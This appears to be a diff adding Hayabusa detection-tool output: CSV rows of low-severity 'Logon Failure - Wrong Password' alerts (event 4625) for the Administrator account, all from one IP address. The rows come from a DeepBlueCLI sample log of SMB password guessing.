+2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
